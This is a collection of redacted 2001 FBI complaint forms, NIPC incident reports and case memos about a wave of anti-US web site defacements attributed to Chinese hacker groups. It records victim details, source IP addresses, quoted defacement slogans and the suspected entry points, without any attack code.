Complainant advised that their website, www.caseassist.com, had 
been defaced by someone who posted a page that included the messages, 
“fuck USA government” and fuck “PoizonBOx”. A copy of the defaced page is 
attached to this FD-71. The website was replaced and operation was 
resumed. No damages are being claimed. Information being provided for 
reference. 


Complainant advised complaint will be forwarded to Chicago 
Division which is coordinating efforts on this matter. 


Do not write in this space. 
fuck USA Government
fuck PoizonBOx

contact:sysadmcn@yahoo.com.cn

http://www.caseassist.com/                                          5/10/01
NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below

Subject's name and aliases              Character of case

NIPCTIP

Complainant                             [ ] Protect Source
                                                                    b6
Authorden.com                                                       b7C
Complaint received
[ ] Personal [ ] Telephonic   Date 5/14/01   Time [illegible]
Address of Subject                      Complainant's address and telephone number
                                        [illegible] Santa Clara CA 95051
Sex   Age   Social Security Number
Scars, marks and other data
Employer   Address   Telephone
Facts of Complaint 
On Friday, May 11, 2001, complainant discovered that his system was compromised and his web page was defaced with anti-American comments (black background with red letters). The intruder was able to copy 4 files into Authorden's system: default.asp, default.htm, index.asp, and index.htm.

The complainant proceeded to change the password and rebooted his system, but the intruder was back within one minute. Complainant repeated this process again, and the intruder did not re-connect until Monday (May 14, 2001). As a result of this, complainant had to shut his system down until 2:00PM.

Complainant advised that his logs show the attacker came from IP address 202.104.4.217. The victim's IP is 64.226.241.24 (www.authorden.com). Authorden server runs Windows 2000. Complainant advised that he has multiple logs documenting the attack. Complainant was asked to maintain all logs, as well as a backup of the system, if possible, as evidence.

Do not write in this space.
                                                                    b6
SA [____]                                                           b7C


(Complaint received by)                 BLOCK STAMP

Complaint Form
FD-71 (Rev. 3-27-95)

NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below


Subject's name and aliases Character of case 


NIPCIP 


Complainant                             [ ] Protect Source
b6 
b7Cc 


Complaint received 


[ ] Personal [X] Telephonic   Date 5/17/01   Time 2:45 PM

Address of Subject                      Complainant's address and telephone number
                                        Siebel Systems, Inc., San Mateo, CA


Complainant's DOB 


Scars, marks and other data 


Subject’s 
Description 


Employer   Address   Telephone


Vehicle Description 


Facts of Complaint 


On May 16, 2001, Sergeant [____], San Mateo County Sheriff's Office, contacted SA [____] and advised that he received a call from Siebel Systems, reporting a compromised computer system. Sergeant [____] further advised that the attack consisted of a defaced web page with anti-American remarks (red letters on a black background). SA [____] agreed to contact the victim company the following day.                                            b6
                                                                    b7C


[____], Siebel Systems, Inc., advised that on May 16, 2001, their help desk received a call reporting that their web page was defaced. Upon examination, the company discovered that at approximately 3:32 PM, an individual replaced the "default" and "index" files. No other files were deleted or replaced. The company proceeded to take the server off-line.                                      b7C

Do not write in this space.

The compromised system, outlook.siebel.com, IP address 216.217.80.44, was running Windows 2000, with IIS 5. [____] advised that the system was not "to date" on the patches.                                        b6
                                                                    b7C

SA [____]
(Complaint received by)                 BLOCK STAMP


b6 


[____] is not aware of the originating IP address of the attacker, since he has not reviewed the logs.

[____] is not aware of the financial loss to date. However, as of the time of this report, the system was still down, pending the cleaning prior to bringing it back on-line. Consequently, [____] indicated that there was a financial loss.

[____] agreed to maintain copies of all logs and/or backups, and to provide them to the FBI upon request.

Complaint Form
NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [X] Negative [ ] See below


Subject's name and aliases Character of case 


UNSUB                                   Computer Intrusion [illegible]

Complainant                             [ ] Protect Source
                                                                    b7C
Complaint received

[ ] Personal [ ] Telephonic   Date 05/11/01   Time 9:00 am

Address of Subject                      Complainant's address and telephone number

M


Scars, marks and other data 


Subject’s 
Description 


Employer Address Telephone 
Facts of Complaint
                                                                    b6
[illegible] hacking. The first                                      b7C
incident occurred 7-8 weeks ago. Another incident occurred this morning, 5/11/2001, affecting the company's website, www.equator.com. A message appeared on the website containing the phrase, "Fuck the US Government." It also contained a contact email address of cysodmen@yahoo.com.cn. [____] interpreted the "cn" to reflect the message as coming from China.

Do not write in this space.
                                                                    b6
                                                                    b7C
NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below


Subject's name and aliases Character of case 


UNSUB Computer Intrusion 


Complainant                             [ ] Protect Source


Complaint received 


[ ] Personal [ ] Telephonic   Date 05/11/01   Time 1:15 pm


Address of Subject Complainant's address and telephone number 


50 California Street, SF, CA 


— 
M 


Scars, marks and other data 


Address Telephone 


Subject’s 
Description 


Vehicle Description 


Facts of Complaint 


[____] for USI Insurance Services, Inc., reported an incident of computer intrusion that occurred today, 5/11/01. [____] believes the hacker accessed the company's website, www.usi-insurance.com, via a "hole" or flaw in Microsoft's security software. A message appeared on the company's website containing the phrase "Fuck the US Government."

[____] works for the company in Connecticut; however, the company is based out of San Francisco. He provided the names and numbers of [illegible] that can be contacted locally: [____]


Do not write in this space. 
FBI FACSIMILE
COVER SHEET
PRECEDENCE                CLASSIFICATION
[X] Immediate             [ ] Top Secret          Time Transmitted:
[ ] Priority              [ ] Secret              Sender's Initials: [illegible]
[ ] Routine               [ ] Confidential        Number of Pages: [illegible]
                          [ ] Sensitive           (including cover sheet)
                          [X] Unclassified
To: San Francisco Field Office                    Date: 05/25/01
    Name of Office
Facsimile Number: (415) 553-7674
                                                                    b6
Attn: SSA [____]          (415) 553-7400
      Name       Room     Telephone


From: _NIPC Watch and Warning Unit 


Name of Office 


Subject: Web Site Defacement 


Special Handling Instructions: 


Originator's Name: [____]          Telephone: 202-323-3205


Originator's Facsimile Number: 202-323-2079 


Approved: 


Brief Description of Communication Faxed: 


WARNING 


Information attached to the cover sheet is U.S. Government Property. If you are not the intended recipient of this information, disclosure, reproduction, distribution, or use of this information is prohibited (18 U.S.C. § 641). Please notify the originator or the local FBI Office immediately to arrange for proper disposition.


MAY.15.2001   5:28AM

Forwarded - SSA [____]

06/14/2000
(San Francisco FO) 415-553-76[illegible]
National Infrastructure Protection Center 


Cyber Threat and Computer Intrusion 
Incident Reporting Guidelines — 


This form may be used as a guide or vehicle for reporting cyber threat and computer intrusion incident information to the NIPC or other law enforcement organization. It is recommended that these Cyber Incident Reporting Guidelines be used when submitting a report to a local FBI Field Office.

Do NOT include CLASSIFIED information on this form unless you adhere to applicable procedures for proper marking, handling and transmission of classified information. Please contact NIPC Watch Operations Center (202) 323-3205 to arrange secure means to submit classified information.

Information concerning the identity of the reporting agency, department, company, or individual(s) will be treated on a confidential basis. If additional information is required, you will be contacted directly.


Report Date/Time: M gf, Ip Pf] 


When completed, fax to NIPC WWU (202) 323-2079/2082. 




Name: 


, HEALTHHIGHWAY «COM 


Title: 

Telephone/Fax number: 68 — 4-7 32-3 CFAK) 
E-mail: 

Organization: a 


Address: Street [handwritten, illegible] 
City, State, Zip Code [handwritten, partly illegible; appears to read MILPITAS, CA] 


Country: U.S. 


Guerra 


b7c 




Incident Information 


Name of organization: (if same as above, enter “SAME”) 


f (Check here if Federal Government Agency) 
Organization's contact information: 
Telephone number: 
Address: (if same as above, enter “SAME”) 
Street 
City, State, Zip Code 
Country 


E-mail: 


Physical Location(s) of victim's computer system/network (Be Specific): [handwritten, illegible] 


Date/time and duration of incident: [handwritten, illegible] 


Is the affected system/network critical to the organization's mission? 
[X] Yes   [ ] No 


Critical infrastructure sector(s) affected. (Check all that apply) 
[ ] Power                               [ ] Transportation 
[ ] Banking and Finance                 [ ] Emergency Services 
[ ] Government Operations               [ ] Water Supply Systems 
[ ] Gas & Oil Storage and Delivery      [ ] Other (Provide details in remarks) 
[ ] Telecommunications                  [ ] Not applicable 

Remarks: 








Nature of Problem? (Check all that apply) 

[X] Intrusion                           [ ] System impairment/denial of resources 
[ ] Unauthorized root access            [X] Web site defacement 
[ ] Compromise of system integrity      [ ] Hoax 
[ ] Theft                               [ ] Damage 
[ ] Unknown                             [ ] Other (Provide details in remarks) 


Has this problem been experienced before? (If yes, please explain in remarks section): 

[ ] Yes   [X] No 

Remarks: 

Suspected method of intrusion/attack 

[ ] Virus (provide name if known)       [ ] Vulnerability exploited (explain) 
[ ] Denial of Service                   [ ] Trojan horse 
[ ] Distributed Denial of Service       [ ] Trapdoor 
[X] Unknown                             [ ] Other (Provide details in remarks) 
Remarks: 


Suspected perpetrator(s) or possible motivation(s) of the attack 

[ ] Insider / Disgruntled employee      [ ] Former employee 
[ ] Competitor                          [ ] Other (Explain in remarks) 
[X] Unknown 

Remarks; 


The apparent source (IP address) of the intrusion/attack: 


Evidence of spoofing? 
[ ] Yes   [ ] No 
[X] Unknown 




12. What computers/systems (hardware and software) were affected? (Operating system, version): 
[ ] Unix                [ ] OS/2 
[ ] Linux               [ ] VAX/VMS 
[ ] NT                  [X] Windows 
[ ] Sun OS/Solaris      [ ] Other (Please specify in remarks) 


13. Security Infrastructure in place. (Check all that apply) 
[ ] Incident/Emergency Response Team    [ ] Encryption 
[ ] Firewall                            [ ] Secure Remote Access/Authorization tools 
[ ] Intrusion Detection System          [ ] Banners 
[ ] Security Auditing Tools             [ ] Access Control Lists 
[ ] Packet filtering 


14. Did the intrusion/attack result in a loss/compromise of sensitive, classified or proprietary 
information? 

[ ] Yes (Provide details in remarks)    [X] No 

[ ] Unknown 

Remarks: 


Did the intrusion/attack result in damage to system(s) or data? 
[ ] Yes (Provide details in remarks)    [X] No 
Remarks: 


What actions and technical mitigation have been taken? 
[ ] System(s) disconnected from the network    [ ] System Binaries checked 
[ ] Backup of affected system(s)               [ ] Other (Please provide details in remarks) 
[ ] Log files examined                         [ ] No action(s) taken 




Has the local FBI field office been informed? 
[ ] Yes (Which office)    [X] No 


Has another agency/organization been informed? If so, please provide name and phone number. 

[X] Yes   [ ] No 

• State/local police 
• Inspector General 
• CERT-CC 
• FedCIRC 
• JTF-CND 
• Other (Incident Response, law enforcement, etc.) 


When was the last time your system was modified or updated? 

Date: 

Company/Organization that did work (Address, phone, POC information): 
[handwritten, illegible] 

Is the System Administrator a contractor? 

[ ] Yes (Provide POC information)    [X] No 


In addition to being used for law enforcement or national security purposes the intrusion-related 
information I have reported may be shared with: 
[ ] The Public 
[X] InfraGard Members with Secure Access 
Additional Remarks: (Please limit to 500 characters. Amplifying information may be submitted 
separately.) [handwritten, largely illegible; appears to state that the web site's pages were replaced with an anti-U.S. Government message] 


If the reported incident is determined to be a criminal matter you may be contacted by an agent for 
additional information. 


FD-71 (Rev. 3-27-95) 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 


Indices: [X] Negative   [ ] See below 


Subject's name and aliases 


UNSUB 


Address of Subject 


Subject’s 
Description 


Scars, marks and other data 


Employer 


Vehicle Description 


Facts of Complaint 


Complainant 
(NHFO) on 04/28/20 
States Department of Labor 


Character of case, 


Computer Website Hack 
U.S. Department of Labor Web Site 
264 = 


Source 


Referred by FBI New Haven Division 


Complaint received 


O Personal 


Date 04/28/2001 Time 10:15 a 




Telephonic 


Complainant's address and telephone number 


Complainant's DOB Sex 
: : Female 


Address Telephone 


[Complainant] contacted the FBI New Haven Field Office (NHFO) and reported a computer hack of the United 
States Department of Labor (USDOL) website located at WWW.DOL.GOV. The 
website has been altered to display a memorial for the downed Chinese 
fighter pilot, Wang Wei. The website displays the following message: 
"China Hack, China Tianyu, now is here and salute a flag". 

NHFO CART SA [redacted] of the FBI NHFO confirmed the DOL hack. [Redacted] reported the incident 
to the USDOL website administrative point of contact and technical point of contact [redacted]. 
NHFO referred the complaint to WFO. 


BLOCK STAMP 
From: 

To: 

Sent: Tuesday, May 29, 2001 8:59 AM 
Subject: FW: Incident Report 

David, 


Here is a copy of the incident report filed with FedCIRC regarding the web 
page defacement of [redacted]. If you have any additional questions, 
please give me a call at [redacted]. 


Thanks 
Department of Labor 


From: 

Sent: Saturday, April 28, 2001 7:25 PM 
To: 'fedcirc@fedcirc.gov' 

Ce 

Subject: Incident Report 


Federal Computer Incident Response Center 

(FedCIRC) 

Incident Reporting Form 

Your contact information 

name: 

email address: 

telephone number: 

other: N/A . 

Affected Machine(s): Microsoft Internet Information Server (IIS), call 
contact personnel for more descriptive information. 

hostname and IP: ISFPBO1, call contact personnel for specific IP address. 
timezone: EST 


Source(s) of the Attack: Beijing China 
hostname or IP: 211.100.10.166 
timezone: GMT +08:00 

been in contact?: No 


. Description of the incident: 


Web page defacement occurred 


is the defacement of the web page for www.dol.gov. The web page was 
restored from backup. No mission impact or loss of critical services. Cost 
to restore the web page from backup was insignificant. 
FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/05/2001 
To: Counterterrorism Attn: NIPC-CIU (Rm 5965) 
b6 
From: Washington Field b7C 
NS-18/NVRA b7E 


Contact: SA (703) 762-3155 


Approved By: 


Drafted By: 

Title: Subject: UNSUB (S) ; 
Victim: VEHICLE CONTROL TECHNOLOGIES, INC.; 
Type: INTRUSION - INFO SYSTEMS 
Date: ' 05/06/2001 


b7E 


SUBMISSION: [ ] Initial   [ ] Supplemental   [X] Closed 
CASE OPENED: 


CASE CLOSED: 

[ ] No action due to state/local prosecution (Name/Number ) 
[ ] USA declination 

[ ] Referred to Another Federal Agency (Name/Number: ) 
[X] Placed in unaddressed work 

[ ] Closed administratively 

[ ] Conviction 


COORDINATION: FBI Field Office 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: VEHICLE CONTROL TECHNOLOGIES, INC. 


Address/location: 11180 SUNRISE VALLEY DRIVE, SUITE 350 
RESTON, VIRGINIA 20191 


b7Cc 


Purpose of System: Web Server 




Highest classification of information stored in system: None 


System Data: 
Hardware/configuration (CPU): DELL DIMENSION, PII 550 MHz 
Operating System: MICROSOFT WINDOWS 2000 SERVER, SP1 
Software: MICROSOFT EXCHANGE, MICROSOFT IIS v5 


Security Features: 
Security Software Installed: [X] yes   [ ] no 
Logon Warning Banner: [X] yes   [ ] no 


INTRUSION INFORMATION 
Access for intrusion: [X] Internet connection   [ ] dial-up number   [ ] LAN (insider) 
Internet address: 207.251.169.226 


Network name: 


Method: 
Technique(s) used in intrusion: Exploited IIS vulnerability 


Path of intrusion: 


addresses: 1.   2.   3.   4.   5. 
country:   1.   2.   3.   4.   5. 
facility:  1.   2.   3.   4.   5. 
Subject: 
Age: Race: 
Sex: Education: 
Alias(s): Motive: 
Group Affiliation: 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 
Impact: 


Compromise of classified information: [ ] yes   [X] no 
Estimated number of computers affected: 1 
Estimated dollar loss to date: Estimated at $1,000. 


Category of Crime: 
Impairment:                                   Theft of Information: 
[X] Malicious code inserted                   [ ] Classified information compromised 
[ ] Denial of service                         [ ] Unclassified information compromised 
[ ] Destruction of information/software       [ ] Passwords obtained 
[ ] Modification of information/software      [ ] Computer processing time obtained 
                                              [ ] Telephone services obtained 
                                              [ ] Application software obtained 
                                              [ ] Operating software obtained 
Intrusion: 
[X] Unauthorized access 
[ ] Exceeding authorized access 


REMARKS 


On June 05, 2001, SA [redacted] contacted [redacted], b6 
Engineer, Vehicle Control Technologies, Incorporated, b7C 
11180 Sunrise Valley Drive, Reston, Virginia 20191, 
work telephone number [redacted], regarding a NIPC Report 
filed by him on May 08, 2001. After being advised of the identity of the 
interviewing agent, [redacted] voluntarily provided the following 
information: 

On May 06, 2001, [redacted] discovered that his web pages 
were defaced and replaced with a defaced web page containing 
anti-USA Government and PoizonBOx statements. Additionally, an 
email address of sysadmcn@yahoo.com.cn was provided as a point of 
contact on the defaced web page. 


Further analysis revealed that a script was placed on 
Vehicle Control Technologies, Inc.'s web server which allowed the 
intruder(s) to gain root access. Once root access was obtained, 
the intruder(s) deleted all HTML files and installed a 
defaced web page on the aforementioned web server. 


The IP address from which the aforementioned script and 
defaced web page originated, 161.116.199.15, was 
determined to be the source from which the defaced web page was 
installed. The aforementioned IP address resolves to a computer 
system located at the University of Barcelona, Spain. 


For reference purposes, one (1) copy of the related 
email is attached to this document. 
b7C 

To: <nipc.watch@fbi.gov> 


Sent: Tuesday, May 08, 2001 5:32 PM 

Subject: Cyber Incident Report Form 

Report_date_time=5/8/01 17:29 EDT 

Name - 


Title=Engineer 


Telephone Fax Number 
Email 
Organization=Vehicle Control Technologies, Inc. 


Addrs_Street=11180 Sunrise Valley Drive, Suite #350 

City=Reston 

State=VA 

Zip Code=20191 

Country= 

Questioni_Organization=SAME 

Question1_Contact_Info= 

Question1_Tele_Number= 

Question1_Street=SAME 

Question1_City_-State_Zipcd= 

Question1_Country= 

Question1_Email= 

Question2_Location=Vehicle Control Technologies offices located at 11180 
Sunrise Valley Drive, Suite 350, Reston, VA 20191. 
Question3_Date_Time=5/6/01 17:13 EDT 
Question4_Critical=No 

Question5_Remarks=No Remarks 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=Unauthorized root access 
Question6_nature_-of_prob=Web site defacement 
Question6_other= 

Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 

Question8_Remarks=IIS 5.0 running on Windows 2000 server without latest 
security patches. 

Question9_sus_perpetrators=Other 
Question9_Remarks=Suspect Chinese attack, reference to 
"contact:sysadmcn@yahoo.com.cn 

"on the defaced web page. 
Question10_ip_addrs=161.116.199.15 
Question11_evid_of_spoof=No 
Question12_oper_systems=Windows 
Question12_Remarks=Windows 2000 Server SP1 
Question13_security_infrasture=Encryption 
Question13_security_infrasture=Firewall 
Question13_security_infrasture=Secure Remote Access/Authorization tools 
Question13_security_infrasture=Access Control Lists 
Question13_security_infrasture=Packet filtering 




Question14_attack_loss_info=No . 
Question14_Remarks=Sensitive, classifed and proprietary information is 
not authorized nor kept on this server. 
Question15_damage_systms=Yes 

Question15_Remarks=Minor defacement to web pages. 
Question16_what_actions=System(s) disconnected from the network 
Question16_what_actions=System Binaries checked 
Question16_what_actions=Backup of affected system(s) 
Question16_what_actions=Log files examined 
Question16_Remarks=No Remarks 

Question17_Field Office= 

Question17_fieldoff_inform=No 

Question18_agency_inform=Yes 

Question18_State_local Police= 

Question18_Inspector General= 

Question18_CERT-CC=submitted on-line incident form 
Question18_FedCIRC= 

Question18_JTF-CND= 

Question18_Other= 

Question19_date_of_last_update=??? 
Question19_org_work_update=Vehicle Control Technologies, Inc. (we manage 
our own server) 

Question20_POC Information= 

Question20_sys_adm_contract=No 

Share Info With=Infrastructure Orgs 

Question21_remarks=Defaced web page included the following text: 


fuck USA Government 
fuck PoizonBOx 


contact:sysadmcn@yahoo.com.cn 


5/9/01 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/05/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, NIPC, Room 5965 


From: Washington Field Office / NVRA 
Squad NS-18 
Contact: SA (703) 762-3054 
Approved By: b7E 


Drafted By: 


Case ID #: (Pending) 
(Pending) 


Title: Subject: UNSUB (S) 


Victim: AMERICAN MANAGEMENT SYSTEMS; 
Type: INTRUSION - INFO SYSTEMS 
Date: 05/05/2001 


b7E 


SUBMISSION: [ ] Initial   [ ] Supplemental   [X] Closed 
CASE OPENED: 


CASE CLOSED: 


[ ] No action due to state/local prosecution (Name/Number ) 
[ ] USA declination 


[ ] Referred to Another Federal Agency (Name/Number: ) 


[X] Placed in unaddressed work 
[ ] Closed administratively 


[ ] Conviction 


COORDINATION: FBI Field Office 
Government Agency 
Private Corporation 




VICTIM 


Company name/Government agency: AMERICAN MANAGEMENT SYSTEMS 
Address/location: 4000 Legato Road 
Fairfax, Virginia 22033 


Purpose of System: 
Highest classification of information stored in system: Unclassified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Microsoft Windows NT 4.0 
Software: IIS 4.0 


Security Features: unknown at this time 
Security Software Installed: [ ] yes   [ ] no 
Logon Warning Banner: [ ] yes   [ ] no 


INTRUSION INFORMATION 


Access for intrusion: [X] Internet connection   [ ] dial-up number   [ ] LAN (insider) 
If Internet: Internet address: 202.39.129.10 (subject) 
208.247.58.xxx (victim subnet) 
Network name: 


Method: 
Technique(s) used in intrusion: sadmind/IIS Worm (CERT Advisory CA-2001-11) 


Path of intrusion: 


addresses: 1.   2.   3.   4.   5. 
country:   1.   2.   3.   4.   5. 
facility:  1.   2.   3.   4.   5. 
Subject: 
Age: Race: 
Sex: Education: 
Alias(s): Motive: 
Group Affiliation: 
Employer: 


Known Accomplices: 




Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 


Impact: 
Compromise of classified information: O yes X no 
Estimated number of computers affected: Five (5) 
Estimated dollar loss to date: Approximately 10-15K 




Category of Crime: 


Impairment:                                   Theft of Information: 
[ ] Malicious code inserted                   [ ] Classified information compromised 
[ ] Denial of service                         [ ] Unclassified information compromised 
[ ] Destruction of information/software       [ ] Passwords obtained 
[X] Modification of information/software      [ ] Computer processing time obtained 
                                              [ ] Telephone services obtained 
                                              [ ] Application software obtained 
                                              [ ] Operating software obtained 
Intrusion: 
[ ] Unauthorized access 
[ ] Exceeding authorized access 


REMARKS 


[Redacted] and [redacted], AMERICAN MANAGEMENT SYSTEMS, 
4000 Legato Road, Fairfax, Virginia 22033, telephone number [redacted], 
were contacted reference a web page defacement which occurred 
on May 5, 2001. 


[Redacted] advised that AMERICAN MANAGEMENT SYSTEMS (AMS), a 
company with approximately 8500 employees, had been the victim of a 
web page defacement. AMS has been a victim of a Chinese web page 
defacement five (5) times, all against different systems. Four (4) 
of the five (5) servers attacked are of little importance to AMS as 
they are test-type servers. However, one of the servers is described 
as a meeting-type server that houses a web page that the employees of 
AMS use to schedule meetings, conferences, etc. The web page was 
deleted from AMS and replaced by the "Honkers" web page. 


[Redacted] advised that the servers did not have any security 
software installed on them, but that they do use Checkpoint 
firewalls. 
From: NIPC-WATCH 


To: 
Date: Wed, May 9, 2001 3:16 AM 
Subject: Cyber Intrusion Report 050901 017 41577 


The Watch received the following report: 


Subject: Cyber Incident Report Form 
Date: Tue, 8 May 2001 15:15:43 -0400 
From: 

To: <nipc.watch@fbi.gov> 


Report_date_time=5/8/2001 3:00pm EDT 


Organization=American Management Systems 
Addrs_Street=4000 Legato Rd. 

City=Fairfax 

State=VA 

Zip Code=22033 

Country=USA 

Question1_Organization=SAME 
Question1_Contact_Info= 
Question1_Tele_Number= 

Question1_Street=SAME 
Question1_City_State_Zipcd= 

Question1_Country= 

Question1_Email= 

Question2_Location=4050 Legato Rd. 

Fairfax, VA 22033 

Question3_Date_Time=5/5/2001 8:39am EDT 
Question4_Critical=No 
Question5_crit_infrasture=Not Applicable 

Question5_Remarks=No Remarks 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=Web site defacement 
Question6_nature_of_prob=Compromise of system integrity 
Question6_nature_of_prob=Damage 
Question6_other= 

Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_Remarks=sadmind/IIS Worm 

(Cert Advisory CA-2001-11) 
Question9_sus_perpetrators=Other 
Question9_Remarks=US-Chinese hacking wars 
Question10_ip_addrs=202.39.129.10 
Question11_evid_of_spoof=No 
Question12_oper_systems=NT 
Question12_Remarks=Microsoft Windows NT 4.0 

IIS 4.0 
Question13_security_infrasture=Incident/Emergency Response Team 
Question13_security_infrasture=Firewall 
Question13_security_infrasture=Intrusion Detection System 
Question13_security_infrasture=Security Auditing Tools 
Question14_attack_loss_info=No 
Question14_Remarks=No Remarks 
Question15_damage_systms=Yes 
Question15_Remarks=Various NT executables and services were corrupted. 
Question16_what_actions=System(s) disconnected from the network 
Question16_what_actions=Backup of affected system(s) 


Question16_what_actions=Log files examined 
Question16_Remarks=No Remarks 
Question17_Field Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=No 
Question18_State_local Police= 
Question18_Inspector General= 
Question18_CERT-CC= 

Question18_ FedCIRC= 
Question18_JTF-CND= 

Question18_Other= 
Question19_date_of_last_update=unknown 
Question19_org_work_update= 
Question20_POC Information= 
Question20_sys_adm_contract=No 

Share Info With=Infrastructure Orgs 
Question21_remarks=No additional remarks 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/06/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, NIPC, Room 5965 


From: Washington Field Office / NVRA 
Squad NS-18 
Contact: SA (703) 762-3054 
Approved By: b7E 


Drafted By: 


Case ID #: (Pending) 
(Pending) 


Title: Subject: UNSUB (S) 


Victim: ASSOCIATION OF TRIAL LAWYERS OF AMERICA; 
Type: INTRUSION - INFO SYSTEMS 
Date: 05/06/2001 


b3 
Reference: b7E 


SUBMISSION: [ ] Initial   [ ] Supplemental   [X] Closed 
CASE OPENED: 


CASE CLOSED: 


[ ] No action due to state/local prosecution (Name/Number ) 
[ ] USA declination 


[ ] Referred to Another Federal Agency (Name/Number: ) 
[X] Placed in unaddressed work 

[ ] Closed administratively 

[ ] Conviction 


COORDINATION: FBI Field Office 
Government Agency 
Private Corporation 




VICTIM 


Company name/Government agency: ASSOCIATION OF TRIAL LAWYERS OF AMERICA 
Address/location: 1050 31st Street, NW 
Washington, DC 20007 


Purpose of System: 
Highest classification of information stored in system: Unclassified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Microsoft Windows NT 4.0 
Software: 


Security Features: unknown at this time 
Security Software Installed: [ ] yes   [X] no 
Logon Warning Banner: [ ] yes   [X] no 


INTRUSION INFORMATION 
Access for intrusion: [X] Internet connection   [ ] dial-up number   [ ] LAN (insider) 
If Internet: Internet address: 


Network name: 


Method: 
Technique(s) used in intrusion: 


Path of intrusion: 


addresses: 1.   2.   3.   4.   5. 
country:   1.   2.   3.   4.   5. 
facility:  1.   2.   3.   4.   5. 
Subject: 

Age: Race: 

Sex: Education: 

Alias(s): Motive: 

Group Affiliation: 

Employer: 

Known Accomplices: 


Equipment used: 




Hardware/configuration (CPU): 
Operating System: 
Software: | 


Impact: 
Compromise of classified information: O yes X no 
Estimated number of computers affected: One (1) 
Estimated dollar loss to date: 






Category of Crime: 
Impairment: Theft of Information: 
[ ] Malicious code inserted                   [ ] Classified information compromised 
[ ] Denial of service                         [ ] Unclassified information compromised 
[ ] Destruction of information/software       [ ] Passwords obtained 
[X] Modification of information/software      [ ] Computer processing time obtained 
                                              [ ] Telephone services obtained 
                                              [ ] Application software obtained 
                                              [ ] Operating software obtained 
Intrusion: 
[ ] Unauthorized access 
[ ] Exceeding authorized access 


REMARKS 


[Redacted], ASSOCIATION OF TRIAL LAWYERS OF AMERICA, 1050 31st Street, NW, 
Washington, DC 20007, telephone number [redacted], was contacted 
reference a web page defacement which occurred on May 6, 2001. 


[Redacted] advised that the ASSOCIATION OF TRIAL LAWYERS OF 
AMERICA (ATLA), an organization that provides research and materials 
for purchase by its members, had been the victim of a web page 
defacement. This is a research-based web site, which provides income 
to ATLA. The web page was deleted from ATLA's site and replaced by 
"Honkers" web pages. 


[Redacted] advised that the FTP port on their web server's IP 
address, 206.5.234.109, was left open and [redacted] believes that this 
is how the "HONKERS" group gained their access. The FTP service has 
since been stopped. 


From: NIPC-WATCH 

To: . 

Date: Wed, May.9, 2001 2:11 AM 

Subject: - Cyber Intrusion Report 050901 007 41565 


The Watch received the following report: 


Subject: Cyber Incident Report Form ~ 
Date: Tue, 08 May 2001 13:51:55 -0400 

From 

To: nipc.watch@fbi.gov 


Report_date_time=May 8, 2001 - 1:40 pm 


Organization=Association of Trial Lawyers of America 
Addrs_Street=1050 31st Street, NW 

City=Washington 

State=DC 

Zip Code=20007 

Country=USA 

Question1_Organization=Same 
Question1_Contact_Info=Same 

Question1_Tele_Number= 

Question1_Street=Same 

Question1_City_State_Zipcd= 

Question1_Country= 

Question1_Email= 

Question2_Location=In ATLA headquarters at address above. 
Question3_Date_Time=May 6 2001, Estimated time at 7:39 am 
Question4_Critical=No 

Question5_crit_infrasture=Other 


Question5_Remarks=This is a research-based web site, which provides income to ATLA. 
Question6_nature_of_prob=Web site defacement 


Question6_other= 

Question7_exp_problem=No 

Question7_Remarks=No Remarks 

Question8_method_of_attack=Other 

Question8_Remarks=Our web pages were replaced by "Honkers" web pages, identified as a Chinese 
group. 

Question9_sus_perpetrators=Other 

Question9_Remarks=Attacks by pro-Chinese group, sending their "political" message 
Question10_ip_addrs=Unknown at this time, but we might be able to find out with 
Question11_evid_of_spoof=Unknown 

Question12_oper_systems=NT 

Question12_Remarks=No Remarks 

Question13_security_infrasture=Encryption 

Question13_security_infrasture=Secure Remote Access/Authorization tools 
Question13_security_infrasture=Security Auditng Tools 
Question14_attack_loss_info=No 

Question14_Remarks=No Remarks 

Question15_damage_systms=Yes 


Question15_Remarks=Deleted existing pages from site which had to be restored from backup tapes 
before site 
Question16_what_actions=Other 

Question16_Remarks=We had an FTP service running, which has been stopped. 
Question17_Field Office= 

Question17_fieldoff_inform=No 

Question18_agency_inform=No 

Question18_State_local Police= 
Question18_Inspector General= 

Question18_CERT-CC= 

Question18_FedCIRC= 

Question18_JTF-CND= 

Question18_Other= 

Question19_date_of_last_update=recently 

Question19_org_work_update= 

Question20_POC Information= 

Question20_sys_adm_contract=No 

Question21_remarks=We think access was made to the site via the ftp service. We have stopped the 
service, and will monitor the site. 
FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/11/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, Room 5965 National 
Infrastructure Protection 
Center (NIPC) 


From: St. Louis 


b3 
Approved By: 


b7C 
Drafted By: b7E 


Title: Subject: HONKER UNION OF CHINA 
Victim: Washington University Psychology Department 


Type: Computer Intrusion (Web Defacement) 


Date: May 11, 2001 


SUBMISSION: [X] Initial   [ ] Supplemental   [ ] Closed 
CASE OPENED: 05/22/2001 


CASE CLOSED: 06/11/2001 (Referred to Chicago Division) 
[ ] No action due to state/local prosecution 

(Name/Number: ) 

[ ] USA declination 

[ ] Referred to Another Federal Agency 

(Name/Number: ) 

[ ] Placed in unaddressed work 

[X] Closed administratively 

[ ] Conviction 


